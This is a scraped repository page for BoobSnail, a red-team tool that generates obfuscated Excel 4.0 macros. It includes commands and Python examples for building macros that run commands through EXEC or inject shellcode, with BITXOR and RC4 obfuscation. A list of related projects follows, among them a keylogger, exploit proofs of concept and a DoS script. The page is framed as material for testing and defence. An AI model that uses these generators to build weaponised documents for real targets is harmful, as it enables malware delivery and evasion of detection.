BoobSnail allows generating Excel 4.0 XLM macro. Its purpose is to support the RedTeam and BlueTeam in XLM macro generation.

Related tags

Security related resourcesobfuscationpentestingpentestblueteammsofficesocial-engineeringredteamexcel-macrosxlm-macroexcel4macros-generator
Overview

License

Follow us on Twitter!

BoobSnail

BoobSnail allows generating XLM (Excel 4.0) macro. Its purpose is to support the RedTeam and BlueTeam in XLM macro generation. Features:

  • various infection techniques;
  • various obfuscation techniques;
  • translation of formulas into languages other than English;
  • can be used as a library - you can easily write your own generator.

Building and Running

Tested on: Python 3.8.7rc1

pip install -r requirements.txt
python boobsnail.py
___.                ___.     _________             .__.__
\_ |__   ____   ____\_ |__  /   _____/ ____ _____  |__|  |
 | __ \ /  _ \ /  _ \| __ \ \_____  \ /    \__  \ |  |  |
 | \_\ (  <_> |  <_> ) \_\ \/        \   |  \/ __ \|  |  |__
 |___  /\____/ \____/|___  /_______  /___|  (____  /__|____/
     \/                  \/        \/     \/     \/
     Author: @_mzer0 @stm_cyber
     (...)

Generators usage

python boobsnail.py <generator> -h

To display available generators type:

python boobsnail.py

Examples

Generate obfuscated macro that injects x64 or x86 shellcode:

python boobsnail.py Excel4NtDonutGenerator --inputx86 <PATH_TO_SHELLCODE> --inputx64 <PATH_TO_SHELLCODE> --out boobsnail.csv

Generate obfuscated macro that runs calc.exe:

python boobsnail.py Excel4ExecGenerator --cmd "powershell.exe -c calc.exe" --out boobsnail.csv

Saving output in Excel

  1. Dump output to CSV file.
  2. Copy content of CSV file.
  3. Run Excel and create a new worksheet.
  4. Add new Excel 4.0 Macro (right-click on Sheet1 -> Insert -> MS Excel 4.0 Macro).
  5. Paste the content in cell A1 or R1C1.
  6. Click Data -> Text to Columns.
  7. Click Next -> Set Semicolon as separator and click Finish.

Library usage

BoobSnail shares the excel4lib library that allows creating your own Excel4 macro generator. excel4lib contains few classes that could be used during writing generator:

  • excel4lib.macro.Excel4Macro - allows to defining Excel4 formulas, values variables;
  • excel4lib.macro.obfuscator.Excel4Obfuscator - allows to obfuscate created instructions in Excel4Macro;
  • excel4lib.lang.Excel4Translator - allows translating formulas to another language.

The main idea of this library is to represent Excel4 formulas, variables, formulas arguments, and values as python objects. Thanks to that you are able to change instructions attributes such as formulas or variables names, values, addresses, etc. in an easy way. For example, let's create a simple macro that runs calc.exe

from excel4lib.macro import *
# Create macro object
macro = Excel4Macro("test.csv")
# Add variable called cmd with value "calc.exe" to the worksheet
cmd = macro.variable("cmd", "calc.exe")
# Add EXEC formula with argument cmd
macro.formula("EXEC", cmd)
# Dump to CSV
print(macro.to_csv())

Result:

cmd="calc.exe";
=EXEC(cmd);

Now let's say that you want to obfuscate your macro. To do this you just need to import obfuscator and pass it to the Excel4Macro object:

from excel4lib.macro import *
from excel4lib.macro.obfuscator import *
# Create macro object
macro = Excel4Macro("test.csv", obfuscator=Excel4Obfuscator())
# Add variable called cmd with value "calc.exe" to the worksheet
cmd = macro.variable("cmd", "calc.exe")
# Add EXEC formula with argument cmd
macro.formula("EXEC", cmd)
# Dump to CSV
print(macro.to_csv())

For now excel4lib shares two obfuscation classes:

  • excel4lib.macro.obfuscator.Excel4Obfuscator uses Excel 4.0 functions such as BITXOR, SUM, etc to obfuscate your macro;
  • excel4lib.macro.obfuscator.Excel4Rc4Obfuscator uses RC4 encryption to obfusacte formulas.

As you can see you can write your own obfuscator class and use it in Excel4Macro.

Sometimes you will need to translate your macro to another language for example your native language, in my case it's Polish. With excel4lib it's pretty easy. You just need to import Excel4Translator class and call set_language

from excel4lib.macro import *
from excel4lib.lang.excel4_translator import *
# Change language
Excel4Translator.set_language("pl_PL")
# Create macro object
macro = Excel4Macro("test.csv", obfuscator=Excel4Obfuscator())
# Add variable called cmd with value "calc.exe" to the worksheet
cmd = macro.variable("cmd", "calc.exe")
# Add EXEC formula with argument cmd
macro.formula("EXEC", cmd)
# Dump to CSV
print(macro.to_csv())

Result:

cmd="calc.exe";
=URUCHOM.PROGRAM(cmd);

For now, only the English and Polish language is supported. If you want to use another language you need to add translations in the excel4lib/lang/langs directory.

For sure, you will need to create a formula that takes another formula as an argument. You can do this by using Excel4Macro.argument function.

from excel4lib.macro import *
macro = Excel4Macro("test.csv")
# Add variable called cmd with value "calc" to the worksheet
cmd_1 = macro.variable("cmd", "calc")
# Add cell containing .exe as value
cmd_2 = macro.value(".exe")
# Create CONCATENATE formula that CONCATENATEs cmd_1 and cmd_2
exec_arg = macro.argument("CONCATENATE", cmd_1, cmd_2)
# Pass CONCATENATE call as argument to EXEC formula
macro.formula("EXEC", exec_arg)
# Dump to CSV
print(macro.to_csv())

Result:

cmd="calc";
.exe;
=EXEC(CONCATENATE(cmd,R2C1));

As you can see ".exe" string was passed to CONCATENATE formula as R2C1. R2C1 is address of ".exe" value (ROW number 2 and COLUMN number 1). excel4lib returns references to formulas, values as addresses. References to variables are returned as their names. You probably noted that Excel4Macro class adds formulas, variables, values to the worksheet automaticly in order in which these objects are created and that the start address is R1C1. What if you want to place formulas in another column or row? You can do this by calling Excel4Macro.set_cords function.

from excel4lib.macro import *
macro = Excel4Macro("test.csv")
# Column 1
# Add variable called cmd with value "calc" to the worksheet
cmd_1 = macro.variable("cmd", "calc")
# Add cell containing .exe as value
cmd_2 = macro.value(".exe")
# Column 2
# Change cords to columns 2
macro.set_cords(2,1)
exec_arg = macro.argument("CONCATENATE", cmd_1, cmd_2)
# Pass CONCATENATE call as argument to EXEC formula
exec_call = macro.formula("EXEC", exec_arg)
# Column 1
# Back to column 1. Change cords to column 1 and row 3
macro.set_cords(1,3)
# GOTO EXEC call
macro.goto(exec_call)
# Dump to CSV
print(macro.to_csv())

Result:

cmd="calc";=EXEC(CONCATENATE(cmd,R2C1));
.exe;;
=GOTO(R1C2);;

Author

mzer0 from stm_cyber team!

Articles

The first step in Excel 4.0 for Red Team

BoobSnail - Excel 4.0 macro generator

Owner
STM Cyber
STM Cyber
GitHub Repository https://blog.stmcyber.com/boobsnail-excel-4-0-macro-generator/
Malware Configuration And Payload Extraction

CAPEv2 (Python3) has now been released CAPEv2 With the imminent end-of-life for Python 2 (January 1 2020), CAPEv1 will be phased out. Please upgrade t

Context Information Security 701 Dec 27, 2022
A simple linux keylogger project.

The project This project is a simple linux keylogger. When activated, it registers all the actions made with the keyboard. The log files are registere

1 Oct 24, 2021
一款针对向日葵的识别码和验证码提取工具

Sunflower_get_Password 一款针对向日葵的识别码和验证码提取工具 👮🏻‍♀️ 免责声明 由于传播、利用Sunflower_get_Password工具提供的功能而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本人不为此承担任何责任。 安装环境 本工具使用Python

635 Dec 20, 2022
command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.

CVE-2021-36260 CVE-2021-36260 POC command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validatio

Aiminsun 165 Dec 21, 2022
Advanced subdomain scanner, any domain hidden subdomains

little advanced subdomain scanner made in python, works very quick and has options to change the port u want it to connect for

Nano 5 Nov 23, 2021
Obfuscated Gradients Give a False Sense of Security: Circumventing Defenses to Adversarial Examples

Obfuscated Gradients Give a False Sense of Security: Circumventing Defenses to Adversarial Examples Above is an adversarial example: the slightly pert

Anish Athalye 838 Dec 18, 2022
This collection of tools that makes it easy to secure and/or obfuscate messages, files, and data.

Scrambler App This collection of tools that makes it easy to secure and/or obfuscate messages, files, and data. It leverages encryption tools such as

Mystic 2 Aug 31, 2022
xkeysnail is yet another keyboard remapping tool for X environment written in Python

xkeysnail is yet another keyboard remapping tool for X environment written in Python. It's like xmodmap but allows more flexible remappings.

Masafumi Oyamada 809 Dec 26, 2022
MITMSDR for INDIAN ARMY cybersecurity hackthon

There mainly three things here: MITMSDR spectrum Manual reverse shell MITMSDR Installation Clone the project and run the setup file: ./setup One of th

2 Jul 26, 2022
DoSer.py - Simple DoSer in Python

DoSer.py - Simple DoSer in Python What is DoSer? DoSer is basically an HTTP Denial of Service attack that affects threaded servers. It works like this

8 Sep 02, 2022
MVT is a forensic tool to look for signs of infection in smartphone devices

Mobile Verification Toolkit Mobile Verification Toolkit (MVT) is a collection of utilities to simplify and automate the process of gathering forensic

8.3k Jan 08, 2023
OLOP: One-Line & Obfuscated Python

OLOP: One-Line & Obfuscated Python This repository contains useful python modules for one-line and obfuscated python. pip install olop-ShadowLugia650

1 Jan 09, 2022
IDAPatternSearch adds a capability of finding functions according to bit-patterns into the well-known IDA Pro disassembler based on Ghidra’s function patterns format.

IDA Pattern Search by Argus Cyber Security Ltd. The IDA Pattern Search plugin adds a capability of finding functions according to bit-patterns into th

David Lazar 48 Dec 29, 2022
Simple tool to create passwords.

PasswordGenerator Simple password generator: -Simplisitc Window Application -Allows Numbers, Symbols & letters upper and lowercase -Restricts rows of

DM 1 Jan 10, 2022
HashDB API hash lookup plugin for IDA Pro

HashDB IDA Plugin Malware string hash lookup plugin for IDA Pro. This plugin connects to the OALABS HashDB Lookup Service. Adding New Hash Algorithms

OALabs 237 Dec 21, 2022
Dependency injection in python with autoconfiguration

The base is a DynamicContainer to autoconfigure services using the decorators @services for regular services and @command_handler for using command pattern.

Sergio Gómez 2 Jan 17, 2022
domato but as a website

ROFL-FUZZER Ths is Domato, a DOM Fuzzer from Google, but hosted as an website It generates a instance of a newtab on the template given by the user ,

Swapnadeep Som 18 Nov 22, 2021
Exploit for GitLab CVE-2021-22205 Unauthenticated Remote Code Execution

Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files tha

Hendrik Agung 2 Dec 30, 2021
In this program, I generate the strong password from existing password without class using python. The special thing in this program is that is generate very strong password from our existing password. It replaces some elements from password and put another elements in it.

Strong-password-Generator-from-existing-password-using-python In this program, I generate the strong password from existing password without class usi

Sachin Vinayak Dabhade 4 Sep 24, 2021
IDA loader for Apple's iBoot, SecureROM and AVPBooter

IDA iBoot Loader IDA loader for Apple's iBoot, SecureROM and AVPBooter Installation Copy iboot-loader.py to the loaders folder in IDA directory. Credi

matteyeux 74 Dec 23, 2022